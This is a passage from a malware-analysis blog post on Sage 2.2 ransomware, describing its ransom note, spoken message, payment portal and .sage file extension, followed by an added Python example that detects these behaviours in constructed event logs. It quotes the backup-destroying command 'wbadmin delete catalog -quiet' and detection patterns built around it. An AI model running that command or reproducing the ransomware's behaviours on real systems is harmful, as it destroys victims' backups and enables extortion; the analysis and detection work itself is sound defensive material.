<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-3rHRnr8-5l0/WeJI1gc8juI/AAAAAAAAB1U/3oefTRzUo2UU6bRlZKsI65McjszrNtJtgCLcBGAs/s1600/sage2_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="715" data-original-width="1143" height="250" src="https://3.bp.blogspot.com/-3rHRnr8-5l0/WeJI1gc8juI/AAAAAAAAB1U/3oefTRzUo2UU6bRlZKsI65McjszrNtJtgCLcBGAs/s400/sage2_2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Sage 2.2 desktop background</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-O8pt-NgimMA/WeJKQGcEa_I/AAAAAAAAB1c/R_wB6-Zn2D8F7h8Vq9W8p4a9JHq_KjV4ACLcBGAs/s1600/sage2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="864" data-original-width="1480" height="232" src="https://4.bp.blogspot.com/-O8pt-NgimMA/WeJKQGcEa_I/AAAAAAAAB1c/R_wB6-Zn2D8F7h8Vq9W8p4a9JHq_KjV4ACLcBGAs/s400/sage2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Sage 2.2 file recovery instructions</td></tr>
</tbody></table>
<br />
<div>
The message reads:<br />
<br />
<blockquote class="tr_bq">
<i>You probably noticed that you can not open your files and that some software stopped working correctly.<br />This is expected. Your files content is still there, but it was encrypted by "SAGE 2.2 Ransomware".<br />Your files are not lost, it is possible to revert them back to normal state by decrypting.<br />The only way you can do that is by getting "SAGE Decrypter" software and your personal decryption key.</i></blockquote>
<br />
Typical features of Sage 2.2 include, but are not limited to:<br />
<ul>
<li>Refresh or update of payment pages is possible;</li>
<li>Ransom note (<i>!HELP_SOS</i>) and portal, including CAPTCHA;</li>
</ul>
And...<br />
<br />
It speaks! Just like Cerber did at some point, Sage 2.2 plays a spoken message for the victim using Microsoft SAPI (the Windows Speech API):<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://1.bp.blogspot.com/-gXgvDPU5i-Q/WeJLrknJR0I/AAAAAAAAB1o/LOp7TJAI4DwJl-ahgzP0At4IOQ1A3IfigCLcBGAs/s1600/voice.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="276" data-original-width="1600" height="67" src="https://1.bp.blogspot.com/-gXgvDPU5i-Q/WeJLrknJR0I/AAAAAAAAB1o/LOp7TJAI4DwJl-ahgzP0At4IOQ1A3IfigCLcBGAs/s400/voice.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption">Figure 3 - VBScript which will speak to the victim (click to enlarge)</td></tr>
</tbody></table>
<br />
Interestingly enough, even though the version number still indicates 2.2, there's at least one slight change:<br />
<ul>
<li>Deletion or purge of backup catalog/history by using:<br /><i style="font-weight: bold;">wbadmin delete catalog -quiet</i></li>
</ul>
<br />
The portal or decryption pages look as follows, stepping through:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-YK8dldOq8XM/WeJMR7xRxVI/AAAAAAAAB1w/jlh0zAgxgJwBV7JTVaXs-x_v4EZOQPtcQCLcBGAs/s1600/login.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="361" data-original-width="738" height="195" src="https://3.bp.blogspot.com/-YK8dldOq8XM/WeJMR7xRxVI/AAAAAAAAB1w/jlh0zAgxgJwBV7JTVaXs-x_v4EZOQPtcQCLcBGAs/s400/login.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Sage 2.2 user login portal</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-BDKKfuHr_3o/WeJMwprZMaI/AAAAAAAAB10/x9EppBX6wm4B9-DEVmBHtmhFEGBkD417wCLcBGAs/s1600/captchta.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="286" data-original-width="703" height="162" src="https://1.bp.blogspot.com/-BDKKfuHr_3o/WeJMwprZMaI/AAAAAAAAB10/x9EppBX6wm4B9-DEVmBHtmhFEGBkD417wCLcBGAs/s400/captchta.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Captcha</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-7AfaePNgAXU/WeJNM5xOzCI/AAAAAAAAB14/bFQbVfSkABYiH9ohYQDk9E8iM1DDUT7lwCLcBGAs/s1600/lang.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="410" data-original-width="674" height="242" src="https://2.bp.blogspot.com/-7AfaePNgAXU/WeJNM5xOzCI/AAAAAAAAB14/bFQbVfSkABYiH9ohYQDk9E8iM1DDUT7lwCLcBGAs/s400/lang.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - Language selection</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-VNOhrnG_gZk/WeJNM3BuzhI/AAAAAAAAB18/jxMtFZRgBgQnKjxZFhsWXN16Lqf4q-4zACLcBGAs/s1600/endportal.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="575" data-original-width="1600" height="143" src="https://1.bp.blogspot.com/-VNOhrnG_gZk/WeJNM3BuzhI/AAAAAAAAB18/jxMtFZRgBgQnKjxZFhsWXN16Lqf4q-4zACLcBGAs/s400/endportal.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 7 - Final portal</td></tr>
</tbody></table>
<br />
The victim can choose from a multitude of languages, and, at the final portal, a special price for the decryption is offered for a limited time (7 days): currently 0.17720 BTC, which is about $1000.<br />
<br />
As usual, there are Payment, Test Decryption, Instructions, and even Support tabs:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-qC2P5dI5sfM/WeJQKpiFA8I/AAAAAAAAB2I/mwN8unUtdXs93BD6lTcQ0Kt77vPnWwEXgCLcBGAs/s1600/payment.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="470" data-original-width="1156" height="162" src="https://3.bp.blogspot.com/-qC2P5dI5sfM/WeJQKpiFA8I/AAAAAAAAB2I/mwN8unUtdXs93BD6lTcQ0Kt77vPnWwEXgCLcBGAs/s400/payment.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 8 - Payment tab</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-4nIdsSBkMN0/WeJQLOuWu8I/AAAAAAAAB2Q/d5KU1AuGvC473geQe9ryypeoQtcJYm_3gCLcBGAs/s1600/testdecr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="495" data-original-width="1157" height="170" src="https://4.bp.blogspot.com/-4nIdsSBkMN0/WeJQLOuWu8I/AAAAAAAAB2Q/d5KU1AuGvC473geQe9ryypeoQtcJYm_3gCLcBGAs/s400/testdecr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 9 - Test Decryption tab</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ZL41737zQdk/WeJQKhzsCXI/AAAAAAAAB2M/TxJhn87-f2su1lvJU3eDZb4UCPRSZZgbACLcBGAs/s1600/instruc.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="423" data-original-width="1140" height="147" src="https://3.bp.blogspot.com/-ZL41737zQdk/WeJQKhzsCXI/AAAAAAAAB2M/TxJhn87-f2su1lvJU3eDZb4UCPRSZZgbACLcBGAs/s400/instruc.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 10 - Instructions tab</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-hqHfvVrizQU/WeJQKfadD8I/AAAAAAAAB2E/zH2YrApWeVo1UIdhQ5jcSfoROUKH1nSJgCLcBGAs/s1600/support.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="755" data-original-width="1154" height="261" src="https://1.bp.blogspot.com/-hqHfvVrizQU/WeJQKfadD8I/AAAAAAAAB2E/zH2YrApWeVo1UIdhQ5jcSfoROUKH1nSJgCLcBGAs/s400/support.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 11 - Support requests tab</td></tr>
</tbody></table>
<br />
Sage 2.2 appends the .sage extension to encrypted files, and currently it does not appear that files can be decrypted without the cybercriminal's help.<br />
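As an added example (not code from the original post), the Python below turns the Sage 2.2 behaviours noted above, the backup catalog purge via <i>wbadmin delete catalog -quiet</i>, the <i>!HELP_SOS</i> ransom note and the .sage extension on encrypted files, into detection checks run over a handful of constructed, Sysmon-style process-creation and file-creation events. The event layout, the sample paths and PIDs, the ransom note's file extension and the mass-rename threshold are all assumptions made for this example.<br />

```python
"""Constructed detection example for the Sage 2.2 behaviours described in
the post: backup catalog purge via wbadmin, the !HELP_SOS ransom note and
the .sage extension on encrypted files.

Events are modelled as (kind, pid, image, detail) tuples, a simplified
stand-in for Sysmon process-creation (kind "process", detail = command
line) and file-creation (kind "file", detail = target path) records.
The event layout, sample paths and threshold are assumptions."""
from collections import defaultdict
from dataclasses import dataclass

SAGE_EXTENSION = ".sage"        # from the post
RANSOM_NOTE_STEM = "!HELP_SOS"  # note name from the post; the extension is not given, so only the stem is matched
MASS_RENAME_THRESHOLD = 20      # assumed: .sage files written by one process before alerting


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    evidence: str


def _basename(path: str) -> str:
    """Last path component of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def is_backup_catalog_deletion(command_line: str) -> bool:
    """True when the command line is wbadmin deleting the backup catalog,
    regardless of casing, a full path to the binary, or extra flags such as -quiet."""
    tokens = command_line.lower().split()
    if len(tokens) < 3:
        return False
    exe = _basename(tokens[0].strip('"'))
    if exe not in ("wbadmin", "wbadmin.exe"):
        return False
    # "delete" must be immediately followed by "catalog"
    return any(a == "delete" and b == "catalog" for a, b in zip(tokens[1:], tokens[2:]))


def analyse(events):
    """Run the three checks over an event list and return the findings."""
    findings = []
    sage_files = defaultdict(int)  # pid -> number of .sage files written
    for kind, pid, image, detail in events:
        if kind == "process":
            if is_backup_catalog_deletion(detail):
                findings.append(Finding("backup_catalog_deleted", pid, detail))
        elif kind == "file":
            name = _basename(detail)
            if name.lower().endswith(SAGE_EXTENSION):
                sage_files[pid] += 1
            if name.upper().startswith(RANSOM_NOTE_STEM):
                findings.append(Finding("ransom_note_dropped", pid, detail))
    for pid, count in sage_files.items():
        if count >= MASS_RENAME_THRESHOLD:
            findings.append(Finding("mass_sage_extension", pid,
                                    f"{count} files written with {SAGE_EXTENSION}"))
    return findings


# Constructed sample events (paths, PIDs and the note's .txt extension are made up).
SAMPLE_EVENTS = [
    ("process", 4120, r"C:\Windows\System32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    ("process", 4200, r"C:\Windows\System32\wbadmin.exe", "wbadmin get versions"),  # benign
]
_PAYLOAD = r"C:\Users\victim\AppData\Roaming\spam1.exe"
SAMPLE_EVENTS += [("file", 3950, _PAYLOAD, rf"C:\Users\victim\Documents\report{i}.docx.sage")
                  for i in range(40)]
SAMPLE_EVENTS.append(("file", 3950, _PAYLOAD, r"C:\Users\victim\Documents\!HELP_SOS.txt"))

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.evidence}")
```

The wbadmin check is deliberately narrow (the binary name plus the adjacent "delete catalog" tokens) so that legitimate backup administration such as listing versions does not trip it, while the .sage count is per process so that a single user copying an already-encrypted file does not alert; on a real endpoint the same three signals would be read from Sysmon event IDs 1 and 11 rather than from the constructed tuples.<br />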
<br />
As always, try to restore from a backup if possible, and avoid paying the ransom.<br />
<br />
Additionally, have a look at my <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">ransomware prevention</a> page, on how to protect yourself.<br />
<br />
<b>IOCs</b><br />
<br />
The IOCs for this post are published as an AlienVault OTX pulse: <a href="https://otx.alienvault.com/pulse/59e24f68d774923bf414d431" target="_blank">https://otx.alienvault.com/pulse/59e24f68d774923bf414d431</a><br />
</div>
Posted by Bart<br />